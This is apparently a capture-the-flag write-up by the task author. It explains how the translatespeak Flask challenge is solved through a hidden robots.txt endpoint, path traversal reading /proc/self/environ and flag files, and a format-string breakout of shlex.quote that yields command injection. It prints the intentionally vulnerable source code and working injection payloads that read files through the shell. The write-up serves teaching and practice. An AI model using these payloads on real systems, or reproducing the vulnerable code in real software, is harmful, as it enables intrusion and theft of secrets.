JHtC4BSK translatespeak [web] writeup
This is a writeup of the translatespeak{1,2,3} web security tasks I prepared for the JHtC4BSK CTF, which was held mainly for MIMUW students by JHtC.
By the way, if you want to host and solve those tasks on your own, you can do that with docker-compose by cloning this repository and running docker-compose up -d in the hosted/translatespeak directory. This requires Docker and docker-compose to be installed on your machine.
Challenge descriptions
translatespeak1 [WEB 100]
Robots are not disallowed if you just need to check some particular endpoints.
http://jhtc4bsk.jhtc.pl:40222/
translatespeak2 [WEB 200]
If you haven't found the source code during translatespeak1, don't start with that.
http://jhtc4bsk.jhtc.pl:40222/
translatespeak3 [WEB 200]
It turned out that translatespeak2 was too easy, so here is the real challenge.
http://jhtc4bsk.jhtc.pl:40222/
–> SPOILER ALERT - scroll down for solutions <–
You should really try doing those by yourself! ;)
Solutions
Basic info
Once we get to the page, we can send a string that will be translated from the given (source) language to the given (destination) language.
After submitting a translation, synthesized speech of the source text is played in English, and the sound file can be downloaded by clicking the "here" link.
translatespeak2
The task description says "Robots are not disallowed (...)", which hints at robots.txt, a file used to give web robots instructions about a site.
http://jhtc4bsk.jhtc.pl:40222/robots.txt indeed returned a pretty big file, which can be seen here. There are a lot of endpoints there, with different User-agent values specified.
The idea behind that was to force participants to write a script that would send a GET request to each of those endpoints to find the one that works.
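A minimal sketch of such a script, assuming the file follows the usual robots.txt layout of a User-agent line followed by Allow/Disallow lines. The helper names parse_robots and probe are hypothetical, and the googlebot entry in the sample is made up for illustration; only the magic and /backup pair comes from the task.

```python
import urllib.error
import urllib.request


def parse_robots(text):
    """Return (user_agent, path) pairs from robots.txt-style text."""
    pairs = []
    agent = None
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()  # drop comments and whitespace
        if ':' not in line:
            continue
        key, value = (part.strip() for part in line.split(':', 1))
        key = key.lower()
        if key == 'user-agent':
            agent = value
        elif key in ('allow', 'disallow') and agent and value:
            pairs.append((agent, value))
    return pairs


def probe(base_url, pairs):
    """Yield (agent, path, status) for every pair; performs real HTTP requests."""
    for agent, path in pairs:
        req = urllib.request.Request(base_url + path,
                                     headers={'User-Agent': agent})
        try:
            with urllib.request.urlopen(req, timeout=5) as resp:
                status = resp.status
        except urllib.error.HTTPError as err:
            status = err.code  # 4xx/5xx responses (418 included) end up here
        yield agent, path, status


# Made-up sample in the assumed layout; the real file was much bigger.
sample = """
User-agent: googlebot
Disallow: /admin

User-agent: magic
Disallow: /backup
"""
print(parse_robots(sample))
```

Feeding the parsed pairs to probe('http://jhtc4bsk.jhtc.pl:40222', pairs) would then show which endpoint answers with something other than an error status.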
The proper endpoint was /backup, but the User-agent header (which browsers send so that the server knows which browser you use) was crucial as well.
If one didn’t send the expected User-agent, they got a funny 418 I'M A TEAPOT response code along with a redirect to the Rick Roll YouTube video:
curl http://jhtc4bsk.jhtc.pl:40222/backup -v
* Trying 138.68.97.247...
* TCP_NODELAY set
* Connected to jhtc4bsk.jhtc.pl (138.68.97.247) port 40222 (#0)
> GET /backup HTTP/1.1
> Host: jhtc4bsk.jhtc.pl:40222
> User-Agent: curl/7.55.1
> Accept: */*
>
< HTTP/1.1 418 I'M A TEAPOT
< Server: gunicorn/19.6.0
< Date: Thu, 19 Oct 2017 16:56:37 GMT
< Connection: close
< Content-Type: text/html; charset=utf-8
< Content-Length: 293
< Location: https://www.youtube.com/watch?v=dQw4w9WgXcQ
<
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
* Closing connection 0
<p>You should be redirected automatically to target URL: <a href="https://www.youtube.com/watch?v=dQw4w9WgXcQ">https://www.youtube.com/watch?v=dQw4w9WgXcQ</a>. If not click the link.
But if one sent the proper User-agent, magic (the one matching /backup in robots.txt), e.g. with this curl request:
curl http://jhtc4bsk.jhtc.pl:40222/backup -H User-agent:magic
We got the following response (NOTE that the code itself starts with # <!-- and ends with # --!>; thanks to that, if the response was rendered in a browser, the source code wasn’t displayed, as it sits inside an HTML comment):
<form action="/translate">
Translate string:<br>
<input type="text" name="translate" value=""><br/>
Source lang:<br>
<input type="text" name="src" value="pl"><br/>
Dest lang:<br>
<input type="text" name="dst" value="en"><br/>
<input type="submit" value="Submit">
</form>
# <!--
import os
import shlex
import subprocess
import logging
from uuid import uuid4
from flask import Flask, request, redirect
from googletrans import Translator
logging.basicConfig(level=logging.DEBUG)
app = Flask(__name__)
flag_1 = os.environ['JHtC4BSK_FIRST_FLAG']
base = """
<form action="/translate">
Translate string:<br>
<input type="text" name="translate" value=""><br/>
Source lang:<br>
<input type="text" name="src" value="pl"><br/>
Dest lang:<br>
<input type="text" name="dst" value="en"><br/>
<input type="submit" value="Submit">
</form>
"""
hear = """
"""
@app.route('/')
def root():
    return base
TMP_PATH = '/tmp'
@app.route('/translate')
def translate():
    string = request.args.get('translate')
    dst = request.args.get('dst', 'en')
    src = request.args.get('src', 'pl')
    if string:
        string = string[:100]
        tr = Translator().translate(string, dest=dst, src=src)
        fname = os.path.join(TMP_PATH, str(uuid4()))
        try:
            cmd = 'espeak --stdout {}'.format(shlex.quote(string))
            cmd += ' > {0}'
            cmd = cmd.format("'" + fname + "'")
            logging.info('Trying to invoke %s' % cmd)
            subprocess.check_output(cmd, shell=True, env={})
        except Exception as e:
            fname = None
            raise e
        render = base + '<br><br>Translated %s to %s' % (tr.origin, tr.text)
        if fname:
            render += '<br><br>Download espeak <a href="%s">here</a>' % fname
            render += """
<br>
<script>
var audio = new Audio('%s');
audio.play();
</script>
""" % fname
        return render
    return ''
@app.route(TMP_PATH + '/<filename>')
def tmp(filename):
    if 'flag' in filename:  # /tmp/flag_2, /tmp/flag_3
        return 'lol no'
    with open(os.path.join(TMP_PATH, filename), 'rb') as f:
        return f.read()
# fake server
@app.route('/robots.txt')
def robots():
    return cachedfile(os.path.realpath('robots.txt'))
@app.route('/backup')
def backup():
    if request.headers.get('User-Agent') != 'magic':
        return redirect('https://www.youtube.com/watch?v=dQw4w9WgXcQ', code=418)
    filename = request.args.get('fname', os.path.realpath(__file__))
    if 'flag_3' in filename:
        return 'lol no'
    return base + cachedfile(filename)
cache = {}
def cachedfile(fname):
    print("Requesting ", fname)
    if fname not in cache:
        try:
            with open(fname) as f:
                print('Saving file %s in cache' % fname)
                cache[fname] = f.read()
        except FileNotFoundError:
            return '<!-- File not found, sorry --!>'
    return cache[fname]
if __name__ == '__main__':
    app.run(debug=True)
# --!>
As we can see, one can pass the fname query parameter to the backup endpoint and so fetch any file; this is a path traversal vulnerability.
There is a suggestion in the code that the 2nd and 3rd flags lie in /tmp, so flag_2 can be fetched using this query parameter:
$ curl http://jhtc4bsk.jhtc.pl:40222/backup?fname=/tmp/flag_2 -H User-agent:magic
<form action="/translate">
Translate string:<br>
<input type="text" name="translate" value=""><br/>
Source lang:<br>
<input type="text" name="src" value="pl"><br/>
Dest lang:<br>
<input type="text" name="dst" value="en"><br/>
<input type="submit" value="Submit">
</form>
JHtC4BSK{4w3s0m3_j0b_with_th4t_c0mm4nd_inj3ct1on!}
When I created this task, my initial idea was that it should be solved with a command injection but it turned out I forgot to filter flag_2 from path traversal in the /backup endpoint - that is why we have added flag_3.
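For reference, the same request can be put together in Python. This is only a sketch: backup_request and is_blocked are hypothetical helper names, and is_blocked simply mirrors the single 'flag_3' substring check visible in the /backup handler above.

```python
import urllib.parse
import urllib.request

BASE_URL = 'http://jhtc4bsk.jhtc.pl:40222'


def backup_request(path):
    """Build (but do not send) a GET request asking /backup for `path`."""
    query = urllib.parse.urlencode({'fname': path})
    return urllib.request.Request(
        BASE_URL + '/backup?' + query,
        headers={'User-Agent': 'magic'},
    )


def is_blocked(path):
    """Mirror of the only check /backup performs on the file name."""
    return 'flag_3' in path


req = backup_request('/tmp/flag_2')
print(req.full_url)
print(is_blocked('/tmp/flag_2'), is_blocked('/tmp/flag_3'))
```

Passing req to urllib.request.urlopen would send it. Since only names containing flag_3 are rejected, /tmp/flag_2 and any other readable file go straight through.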
translatespeak1
As we could see in the code, the first flag should be located in an environment variable:
flag_1 = os.environ['JHtC4BSK_FIRST_FLAG']
We can actually grab it by exploiting the path traversal and fetching the /proc/self/environ file, which contains the environment variables of the current process:
$ curl jhtc4bsk.jhtc.pl:40222/backup?fname=/proc/self/environ -H User-agent:magic -o output && cat output
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 565 100 565 0 0 565 0 0:00:01 --:--:-- 0:00:01 6726
<form action="/translate">
Translate string:<br>
<input type="text" name="translate" value=""><br/>
Source lang:<br>
<input type="text" name="src" value="pl"><br/>
Dest lang:<br>
<input type="text" name="dst" value="en"><br/>
<input type="submit" value="Submit">
</form>
PATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binHOSTNAME=fdf7471e931dJHtC4BSK_FIRST_FLAG=JHtC4BSK{Gr34t_j0b_mr_r0b0t!}LANG=C.UTF-8GPG_KEY=0D96DF4D4110E5C43FBFB17F2D347EA6AA65421DPYTHON_VERSION=3.6.3PYTHON_PIP_VERSION=9.0.1HOME=/home/jailed
And so we got the flag - JHtC4BSK{Gr34t_j0b_mr_r0b0t!}.
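The variables look glued together in the output above because /proc/self/environ separates entries with NUL bytes rather than newlines. A small sketch of splitting such a dump into a dictionary (parse_environ is a hypothetical helper, and the sample is a shortened copy of the response above):

```python
def parse_environ(raw):
    """Split the raw bytes of /proc/<pid>/environ into a dict."""
    env = {}
    for entry in raw.split(b'\x00'):
        if not entry:
            continue  # a trailing NUL leaves an empty chunk
        name, _, value = entry.partition(b'=')
        env[name.decode()] = value.decode(errors='replace')
    return env


# Shortened sample in the same shape as the response above.
raw = (b'HOSTNAME=fdf7471e931d\x00'
       b'JHtC4BSK_FIRST_FLAG=JHtC4BSK{Gr34t_j0b_mr_r0b0t!}\x00'
       b'LANG=C.UTF-8\x00')
print(parse_environ(raw)['JHtC4BSK_FIRST_FLAG'])
```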
translatespeak3
The flag_3 has to be retrieved through a command injection vulnerability in the /translate endpoint, via the string value (the translate query parameter) we send to it:
# this is just the interesting parts of the code
string = request.args.get('translate')
if string:
    string = string[:100]
    fname = os.path.join(TMP_PATH, str(uuid4()))
    try:
        cmd = 'espeak --stdout {}'.format(shlex.quote(string))
        cmd += ' > {0}'
        cmd = cmd.format("'" + fname + "'")
        logging.info('Trying to invoke %s' % cmd)
        subprocess.check_output(cmd, shell=True, env={})
    except Exception as e:
        fname = None
        raise e
So it turns out that our string is passed to shlex.quote, which should give us a safe string that can be passed to the shell:
In [2]: shlex.quote?
Signature: shlex.quote(s)
Docstring: Return a shell-escaped version of the string *s*.
File: /usr/lib/python3.6/shlex.py
Type: function
But… then the string is concatenated with ' > {0}' and the .format method is called on the result, which can be exploited. The point is, one can produce a ' character and break out of the quotation produced by shlex.quote with:
- {0[0]}, which exploits the fact that ' is the first character of the argument passed to .format
- {0.__doc__[11]}, which is a really interesting way that was unintended (and unknown to me)
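The breakout can be reproduced offline. The sketch below rebuilds the command string with the same three steps as the handler; build_cmd is a hypothetical wrapper and /tmp/some-uuid stands in for the real uuid4 file name.

```python
import shlex


def build_cmd(string, fname):
    """Rebuild the shell command the same way the /translate handler does."""
    cmd = 'espeak --stdout {}'.format(shlex.quote(string))
    cmd += ' > {0}'
    return cmd.format("'" + fname + "'")


fname = '/tmp/some-uuid'  # hypothetical stand-in for the uuid4 name

# A benign string stays inside the quotes added by shlex.quote.
print(build_cmd('hello world', fname))

# {0[0]} is expanded by the second .format call into a quote character.
print(build_cmd('{0[0]} | cat {0[0]}/tmp/flag_3', fname))

# str.__doc__ starts with "str(object='')", so index 11 is also a quote.
print(repr('{0.__doc__[11]}'.format('anything')))
```

The second call yields espeak --stdout '' | cat '/tmp/flag_3' > '/tmp/some-uuid': the quotes emitted by shlex.quote get paired up with the injected ones, so the pipe is interpreted by the shell.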
Some of the solutions:
- {0[0]} | cat {0[0]}/tmp/flag_3 - this puts the flag directly into the ‘sound file’ (which isn’t a sound file anymore).
- {0.__doc__[11]}$(cat /tmp/flag_3 | base64 -w 0 > {0}.hehe){0.__doc__[11]} - this puts the flag into the /tmp/<uuid>.hehe file, which can then be retrieved through either the /backup?fname=... or the /tmp/... endpoint.
- {0[0]} >/dev/null; espeak --stdout $(cat /tmp/flag_2) -a {0[0]}100 - this makes the service read the flag aloud in English, which is a bit bad, as you don’t know whether the letters are capital, and special characters (underscores and the exclamation mark) are not read.
- -f/tmp/flag_2 - does the same as above.
Also, someone had the great idea of checking -h and --help injections, which just printed the help for espeak :).
And so the flag is JHtC4BSK{hope_that_this_time_you_really_got_it_with_a_command_injection!} ;).
Some random stuff
- The best folk - gorbak - solved all the challenges with just blind command injection - that was awesome.
- I could have removed some of the binaries to make this command injection even harder :P.
- The uploaded files should stay in some unknown path in the filesystem, so people wouldn’t be able to just copy flag to /tmp/ and download it.
- Some of the people tried to brute-force /tmp/<1-4 character strings> just to find flag files produced by other participants - this provoked me to add a cronjob which deleted files from /tmp.
- I really should have passed -- in the espeak command so it would be harder to find out that this is a command injection (if I hadn’t made that mistake with flag_2).
- It should have played the sound of the translated text instead of the text that is going to be translated, but who cares :D.
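As an illustration of the -- remark above, here is one possible way to invoke espeak without a shell and without running .format over user input. This is a sketch and not the code the task used: espeak_argv and synthesize are hypothetical names, and it assumes espeak follows the usual getopt convention of treating everything after -- as text rather than options.

```python
import subprocess


def espeak_argv(text):
    """Argument vector for espeak that treats `text` purely as data."""
    # "--" conventionally ends option parsing, so "-f/tmp/flag_2" or "--help"
    # would be spoken instead of interpreted (assumption about espeak).
    return ['espeak', '--stdout', '--', text]


def synthesize(text, out_path):
    """Run espeak without a shell and write the audio to out_path."""
    with open(out_path, 'wb') as out:
        subprocess.run(espeak_argv(text), stdout=out, check=True, env={})


# The payloads from the solutions stay a single, inert argument.
print(espeak_argv('-f/tmp/flag_2'))
print(espeak_argv('{0[0]} | cat {0[0]}/tmp/flag_3'))
```

With an argument list there is no shell to interpret quotes or pipes, and no format string for {0[0]} to act on.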